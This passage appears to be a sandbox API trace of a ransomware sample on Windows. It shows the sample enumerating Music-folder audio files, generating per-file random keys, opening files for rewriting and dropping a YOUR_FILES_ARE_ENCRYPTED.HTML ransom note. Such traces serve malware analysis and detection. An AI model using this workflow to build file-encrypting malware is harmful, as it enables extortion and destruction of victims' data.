wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5B") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="67") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="E9") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="4C") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9E") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="51") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C4") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="1E") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="1E") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FB") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="97") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B4") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4A") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="45") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="12") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BE") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="4D") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="87") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="84") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="3B") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D7") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="96") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="03") returned 2 [0167.690] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a" [0167.690] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.690] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0167.692] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9a12320, ftCreationTime.dwHighDateTime=0x1d7d7a9, ftLastAccessTime.dwLowDateTime=0x99d91910, ftLastAccessTime.dwHighDateTime=0x1d7e621, ftLastWriteTime.dwLowDateTime=0x99d91910, ftLastWriteTime.dwHighDateTime=0x1d7e621, nFileSizeHigh=0x0, nFileSizeLow=0xcd7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="rmukOi2tRyk.wav", cAlternateFileName="RMUKOI~1.WAV")) returned 1 [0167.692] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav") returned 57 [0167.692] lstrcmpW (lpString1="rmukOi2tRyk.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.692] PathFindExtensionW (pszPath="rmukOi2tRyk.wav") returned=".wav" [0167.692] lstrlenW (lpString=".wav") returned 4 [0167.692] PathFindExtensionW (pszPath="rmukOi2tRyk.wav") returned=".wav" [0167.692] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\rmukoi2tryk.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.699] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=52604) returned 1 [0167.699] GetProcessHeap () returned 0x270000 [0167.699] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0167.700] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="84") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="41") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="42") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="69") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8A") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EC") returned 2 [0167.700] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9C") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BE") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="2D") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="67") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AF") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1F") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="79") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="35") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="28") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="A2") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="60") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="1E") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F1") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="2E") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="42") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="14") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="FF") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C7") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C9") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DF") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6D") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E2") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="96") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B7") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="72") returned 2 [0167.701] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="26") returned 2 [0167.702] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav" [0167.702] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.702] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0167.711] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9a12320, ftCreationTime.dwHighDateTime=0x1d7d7a9, ftLastAccessTime.dwLowDateTime=0x99d91910, ftLastAccessTime.dwHighDateTime=0x1d7e621, ftLastWriteTime.dwLowDateTime=0x99d91910, ftLastWriteTime.dwHighDateTime=0x1d7e621, nFileSizeHigh=0x0, nFileSizeLow=0xcd7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="rmukOi2tRyk.wav", cAlternateFileName="RMUKOI~1.WAV")) returned 0 [0167.715] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.715] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0167.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.716] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.718] CloseHandle (hObject=0x5ac) returned 1 [0167.718] GetProcessHeap () returned 0x270000 [0167.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.719] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b47e1b0, ftCreationTime.dwHighDateTime=0x1d7e1a9, ftLastAccessTime.dwLowDateTime=0x91ebe20, ftLastAccessTime.dwHighDateTime=0x1d7e590, ftLastWriteTime.dwLowDateTime=0x91ebe20, ftLastWriteTime.dwHighDateTime=0x1d7e590, nFileSizeHigh=0x0, nFileSizeLow=0x15a0b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="c2-KpQ.m4a", cAlternateFileName="")) returned 1 [0167.719] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a") returned 40 [0167.719] lstrcmpW (lpString1="c2-KpQ.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.719] PathFindExtensionW (pszPath="c2-KpQ.m4a") returned=".m4a" [0167.719] lstrlenW (lpString=".m4a") returned 4 [0167.719] PathFindExtensionW (pszPath="c2-KpQ.m4a") returned=".m4a" [0167.719] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\c2-kpq.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.720] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=88587) returned 1 [0167.720] GetProcessHeap () returned 0x270000 [0167.720] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.722] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="F8") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="26") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2F") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9B") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="72") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="D5") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="0A") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="41") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="AF") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="E1") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DC") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="29") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="F0") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="67") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="73") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="12") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="EB") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="68") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="84") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A5") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="84") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="4D") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="43") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="F0") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="FD") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="F2") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="81") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="95") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="D0") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="08") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FD") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="38") returned 2 [0167.723] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a" [0167.723] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.723] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.725] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x599db420, ftCreationTime.dwHighDateTime=0x1d7e63d, ftLastAccessTime.dwLowDateTime=0xd0040d40, ftLastAccessTime.dwHighDateTime=0x1d7e669, ftLastWriteTime.dwLowDateTime=0xd0040d40, ftLastWriteTime.dwHighDateTime=0x1d7e669, nFileSizeHigh=0x0, nFileSizeLow=0x7e12, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="d0i80.mp3", cAlternateFileName="")) returned 1 [0167.731] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3") returned 39 [0167.731] lstrcmpW (lpString1="d0i80.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.731] PathFindExtensionW (pszPath="d0i80.mp3") returned=".mp3" [0167.731] lstrlenW (lpString=".mp3") returned 4 [0167.731] PathFindExtensionW (pszPath="d0i80.mp3") returned=".mp3" [0167.732] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\d0i80.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.733] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=32274) returned 1 [0167.733] GetProcessHeap () returned 0x270000 [0167.733] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.734] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="81") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="A6") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="31") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="89") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="77") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="E7") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="86") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A7") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F0") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="72") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="57") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="07") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="01") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="40") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="C2") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="85") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="F4") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="EA") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="F5") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="06") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="3C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="6F") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="6A") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="94") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0A") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="4C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="EE") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="8C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="67") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="BF") returned 2 [0167.735] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5C") returned 2 [0167.735] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3" [0167.735] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.735] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.743] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b5a930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.744] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\desktop.ini") returned 41 [0167.744] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.744] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.744] lstrlenW (lpString=".ini") returned 4 [0167.744] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.744] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8deafe0, ftCreationTime.dwHighDateTime=0x1d7dd48, ftLastAccessTime.dwLowDateTime=0x825c8f90, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x825c8f90, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5c84, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="EDgkOwoCzVQ1piLO.wav", cAlternateFileName="EDGKOW~1.WAV")) returned 1 [0167.744] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav") returned 50 [0167.744] lstrcmpW (lpString1="EDgkOwoCzVQ1piLO.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.744] PathFindExtensionW (pszPath="EDgkOwoCzVQ1piLO.wav") returned=".wav" [0167.744] lstrlenW (lpString=".wav") returned 4 [0167.744] PathFindExtensionW (pszPath="EDgkOwoCzVQ1piLO.wav") returned=".wav" [0167.744] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\edgkowoczvq1pilo.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.745] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=23684) returned 1 [0167.745] GetProcessHeap () returned 0x270000 [0167.745] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.745] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="BF") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="10") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2A") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9C") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="A6") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="44") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="CC") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="DE") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F8") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="2A") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="95") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="0B") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="1B") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="3D") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="A9") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="20") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="71") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="C3") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D4") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A1") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="00") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="4D") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F9") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="D9") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0C") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="2C") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="1E") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="8A") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="D4") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="82") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="28") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="26") returned 2 [0167.747] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav" | out: 